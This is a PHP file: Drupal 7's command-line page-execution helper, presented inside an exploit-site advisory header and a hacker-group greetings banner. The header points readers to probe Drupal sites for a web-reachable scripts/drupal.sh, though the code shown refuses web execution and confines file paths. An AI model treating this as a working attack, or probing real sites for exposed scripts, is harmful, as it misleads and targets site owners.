#!/usr/bin/env php
<?php
/**
* Drupal 7.0 Shell Execution Script
* ================
* By KedAns-Dz <ked-h@exploit-id.com>
* ================
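* (+) On a Drupal installation, check whether this file is reachable at >> http://[local/Path]/scripts/drupal.sh
* The content of 'drupal.sh' is the PHP code below, which executes scripts.
* The script is written for command-line use; it only matters over HTTP if the
* web server is configured to execute files under scripts/.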
* ================
* ------------------------
* Check for your PHP interpreter - on Windows you'll probably have to
* replace line 1 with :
* #!c:/program files/php/php.exe
* @param path Drupal's absolute root directory in local file system (optional).
* @param URI A URI to execute, including HTTP protocol prefix.
*/
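// This helper emulates a web request from the shell, so it must only ever be
// driven by a real command line. Under a web SAPI the argument vector is not
// guaranteed to come from an operator, so refuse to run there.
if (PHP_SAPI !== 'cli' || !isset($_SERVER['argv']) || !is_array($_SERVER['argv'])) {
  echo "This script must be run from the command line.\n";
  exit(1);
}

// The first argv entry is the script's own name; it is only used in the help text.
$script = basename(array_shift($_SERVER['argv']));

if (in_array('--help', $_SERVER['argv'], TRUE) || empty($_SERVER['argv'])) {
  echo <<<EOF
Execute a Drupal page from the shell.
Usage: {$script} [OPTIONS] "<URI>"
Example: {$script} "http://target.org/node"
All arguments are long options.
--help This page.
--root Set the working directory for the script to the specified path.
To execute Drupal this has to be the root directory of your
Drupal installation, f.e. /home/www/foo/drupal (assuming Drupal
running on Unix). Current directory is not required.
Use surrounding quotation marks on Windows.
--verbose This option displays the options as they are set, but will
produce errors from setting the session.
URI The URI to execute, i.e. http://default/foo/bar for executing
the path '/foo/bar' in your site 'default'. URI has to be
enclosed by quotation marks if there are ampersands in it
(f.e. index.php?q=node&foo=bar). Prefix 'http://' is required,
and the domain must exist in Drupal's sites-directory.
If the given path and file exists it will be executed directly,
i.e. if URI is set to http://default/bar/foo.php
and bar/foo.php exists, this script will be executed without
bootstrapping Drupal. To execute Drupal's cron.php, specify
http://default/cron.php as the URI.
To run this script without --root argument invoke it from the root directory
of your Drupal installation with
./scripts/{$script}
\n
EOF;
  exit;
}

// Define default settings: a synthetic GET request for the front page of the
// 'default' site, as seen from localhost.
$cmd = 'index.php';
$_SERVER['HTTP_HOST'] = 'default';
$_SERVER['PHP_SELF'] = '/index.php';
$_SERVER['REMOTE_ADDR'] = '127.0.0.1';
$_SERVER['SERVER_SOFTWARE'] = NULL;
$_SERVER['REQUEST_METHOD'] = 'GET';
$_SERVER['QUERY_STRING'] = '';
// Overrides the '/index.php' value assigned to PHP_SELF above.
$_SERVER['PHP_SELF'] = $_SERVER['REQUEST_URI'] = '/';
$_SERVER['HTTP_USER_AGENT'] = 'console';

// Toggle verbose mode.
$_verbose_mode = in_array('--verbose', $_SERVER['argv'], TRUE);

// Parse invocation arguments. Compare against NULL explicitly so that a falsy
// argument such as "0" or "" does not silently end the loop and drop whatever
// follows it.
while (($param = array_shift($_SERVER['argv'])) !== NULL) {
  switch ($param) {
    case '--root':
      // Change working directory. A missing value (--root as the last
      // argument) is reported the same way as a non-existent directory.
      $root = array_shift($_SERVER['argv']);
      if (!is_string($root) || !is_dir($root)) {
        echo "\nERROR: {$root} not found.\n\n";
      }
      elseif (!chdir($root)) {
        echo "\nERROR: cannot change directory to {$root}.\n\n";
      }
      elseif ($_verbose_mode) {
        echo "cwd changed to: {$root}\n";
      }
      break;

    default:
      if (strncmp($param, '--', 2) === 0) {
        // Ignore unknown options (--verbose was already handled above).
        break;
      }

      // Parse the URI; parse_url() returns FALSE for seriously malformed input.
      $parts = parse_url($param);
      if ($parts === FALSE) {
        echo "\nERROR: {$param} is not a valid URI.\n\n";
        break;
      }

      // Set site name.
      if (isset($parts['host'])) {
        $_SERVER['HTTP_HOST'] = $parts['host'];
      }

      // Set query string.
      if (isset($parts['query'])) {
        $_SERVER['QUERY_STRING'] = $parts['query'];
        parse_str($parts['query'], $_GET);
        $_REQUEST = $_GET;
      }

      // The URI path, minus its leading slash, names a file relative to the
      // working directory. Only accept it for direct execution when it stays
      // inside that directory: no NUL byte, no absolute or drive-letter path,
      // and no '..' segment. The check is lexical on purpose so that symlinked
      // directories inside the Drupal root keep working.
      $candidate = isset($parts['path']) ? (string) substr($parts['path'], 1) : '';
      $is_confined = $candidate !== ''
        && strpos($candidate, "\0") === FALSE
        && !preg_match('~^(?:[/\\\\]|[A-Za-z]:)~', $candidate)
        && !in_array('..', preg_split('~[/\\\\]~', $candidate), TRUE);

      // Set file to execute or Drupal path (clean urls enabled). is_file()
      // rather than file_exists(): a directory cannot be included.
      if ($is_confined && is_file($candidate)) {
        $_SERVER['PHP_SELF'] = $_SERVER['REQUEST_URI'] = $parts['path'];
        $cmd = $candidate;
      }
      elseif (isset($parts['path'])) {
        // Anything else is handed to Drupal as the request path, unless the
        // query string already supplied an explicit q.
        if (!isset($_GET['q'])) {
          $_REQUEST['q'] = $_GET['q'] = $parts['path'];
        }
      }

      // Display setup in verbose mode. q is unset when a file is executed
      // directly, so fall back to an empty string instead of raising a warning.
      if ($_verbose_mode) {
        $q = isset($_GET['q']) ? $_GET['q'] : '';
        echo "Hostname set to: {$_SERVER['HTTP_HOST']}\n";
        echo "Script name set to: {$cmd}\n";
        echo "Path set to: {$q}\n";
      }
      break;
  }
}

// Run the selected script (index.php unless the URI named an existing file)
// in this process, with the emulated request environment set up above.
if (is_file($cmd)) {
  include $cmd;
}
else {
  echo "\nERROR: {$cmd} not found.\n\n";
}
exit();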
/***============================================================================================
***================[ Exploited By KedAns-Dz * HST-Dz * ]===========================================
* Greets To : [D] HaCkerS-StreeT-Team [Z] < Algerians HaCkerS >
* Islampard * Zaki.Eng * Dr.Ride * Red1One * Badr0 * XoreR * Nor0 FouinY * Hani * Mr.Dak007 * Fox-Dz
* Masimovic * TOnyXED * r0073r (inj3ct0r.com) * TreX (hotturks.org) * KelvinX (kelvinx.net) * Dos-Dz
* Nayla Festa * all (sec4ever.com) Members * PLATEN (Pentesters.ir) * Gamoscu (1923turk.com)
* Greets to All ALGERIANS EXPLO!TER's & DEVELOPER's :=> {{
* Indoushka (Inj3ct0r.com) * [ Ma3sTr0-Dz * MadjiX * BrOx-Dz * JaGo-Dz (sec4ever.com) ] * Dr.0rYX
* Cr3w-DZ * His0k4 * El-Kahina * Dz-Girl * SuNHouSe2 ; All Others && All My Friends . }} ,
* 1337day.com * www.packetstormsecurity.org * exploit-db.com * bugsearch.net * exploit-id.com
* www.metasploit.com * www.securityreason.com * All Security and Exploits Webs ...
*================================================================================================
*/